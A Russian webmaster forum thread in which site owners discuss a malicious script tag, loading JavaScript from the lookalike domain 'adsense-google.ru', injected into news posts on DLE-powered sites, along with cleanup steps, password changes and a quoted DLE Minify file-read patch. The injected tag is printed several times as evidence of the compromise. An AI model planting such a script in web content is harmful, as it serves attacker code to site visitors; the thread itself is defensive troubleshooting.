- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Маркетинг для шоколадной фабрики. На 34% выше средний чек
Через устранение узких мест
Оксана Мамчуева
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Сегодня на многих моих DLE сайтах появился опасный код <script type="text/javascript" async="async" src="http://adsense-google.ru/js/8f14e45fceea167a5a36dedd4bea2543.js">
Прописывается эта дрянь в новостях. Т.е открываешь "редактировать новость - выбираешь новость, а там и в краткой и в полной новости код <script type="text/javascript" async="async" src="http://adsense-google.ru/js/8f14e45fceea167a5a36dedd4bea2543.js">
Как защитить движок, как удалить код со всех страниц?
Сегодня на многих моих DLE сайтах появился опасный код <script type="text/javascript" async="async" src="http://adsense-google.ru/js/8f14e45fceea167a5a36dedd4bea2543.js">
Прописывается эта дрянь в новостях. Т.е открываешь "редактировать новость - выбираешь новость, а там и в краткой и в полной новости код <script type="text/javascript" async="async" src="http://adsense-google.ru/js/8f14e45fceea167a5a36dedd4bea2543.js">
Как защитить движок, как удалить код со всех страниц?
Сайты на 1 хостинге? Если да то ответ очевиден - 1 что нужно сделать - сменить хостинг
Сайты на 1 хостинге? Если да то ответ очевиден - 1 что нужно сделать - сменить хостинг
Да при чем здесь хостинг? На любом хостинге это можно подцепить, дело в движке. Нашел решение тут http://webmasters.ru/forum/f141/pomogite-udalit%60-virus-na-dle-chuzhoi-skript-v-novostyah-49206/ пойду пробовать
Решение неверное. Вы удаляете кэш, а в базе записи остаются. Нужно удалить из базы записи и перестроить новости для очистки кэша.
Удаляется этот код перестроением публикаций в админпанели, только если эта гадость попала на статические страницы - там только руками чистить. Проверено.
ТС, после удаления вируса и установки патчей не забудьте сменить пароль от БД, если есть необходимость в помощи стучите.
Так дело в том, что патч у меня уже стоял этот:
Проблема: Недостаточная фильтрация данных в модуле сжатия файлов Minify входящем в состав DLE (https://code.google.com/p/minify/), которая может позволить при определенных настройках серверного ПО читать содержимое файлов.
Ошибка в версии: 8.5 - 10.0
Степень опасности: Высокая
Для исправления откройте файл: /engine/classes/min/index.php и в самое начало файла после строчки:
<?php
добавьте
if (isset($_GET['f'])) {
$_GET['f'] = str_replace(chr(0), '', (string)$_GET['f']);
}
---------- Добавлено 15.10.2013 в 09:46 ----------
Вообщем поменял все пароли от баз данных, так же удалил все записи из баз <script type="text/javascript" async="async" src="http://adsense-google.ru/js/8f14e45fceea167a5a36dedd4bea2543.js"> при помощи софта из этого поста http://webmasters.ru/forum/f141/pomogite-udalit%60-virus-na-dle-chuzhoi-skript-v-novostyah-49206/index2.html#post522956
Также поменял все пароли к админке и фтп.
Странно, что у меня уже стоял этот патч http://dle-news.ru/bags/v10/1580-potencialnaya-ugroza-v-module-minify.html